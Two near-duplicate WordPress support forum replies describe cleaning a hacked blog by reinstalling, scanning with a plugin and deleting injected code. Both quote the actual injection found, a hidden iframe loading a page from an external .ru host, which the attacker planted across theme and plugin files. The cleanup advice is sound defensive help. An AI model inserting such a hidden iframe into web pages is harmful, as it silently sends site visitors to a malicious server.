vinz77
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Exploits and GoDaddyHello,
I suffered from the same. I’m copying my M.O. here, which worked.
I got
/homepages/4/d134610354/htdocs/moebius77/blog2/wp-includes/default-widgets.php on line 423 as an error on my blog. No way to login or other. So:
1) re-install all your WordPress blog, FTP it onto the server again, EXCEPT the WP-Content folder if you want to keep your images and themes.
2) Now you should be able to login. Go to your dashboard and install plugin “Script Exploiter”.
3) Run the plugin and look for malicious script. In my case, I had this baby:
<div style=”display:none”><iframe src=”http://past-another-life.ru:8080/index.php” width=571 height=464 ></iframe></div>
copied on most of my install.php files, on all the themes (default, etc.), on the plugins and others.
4) Download the files with the added script, open them with an editor and erase all the garbage.
5) FTP them back on the server, you should be all right.
Cheers, hope this helps,
VinzForum: Fixing WordPress
In reply to: syntax error on default-widgets.php fileGot It:
1) re-install all your WordPress blog, FTP it onto the server again, EXCEPT the WP-Content folder if you want to keep your images and themes.
2) Now you should be able to login. Go to your dashboard and install plugin “Script Exploiter”.
3) Run the plugin and look for malicious script. In my case, I had this baby:
<div style=”display:none”><iframe src=”http://past-another-life.ru:8080/index.php” width=571 height=464 ></iframe></div>
copied on most of my install.php files, on all the themes (default, etc.), on the plugins and others.
4) Download the files with the added script, open them with an editor and erase all the garbage.
5) FTP them back on the server, you should be all right.
Cheers, hope this helps,
Vinz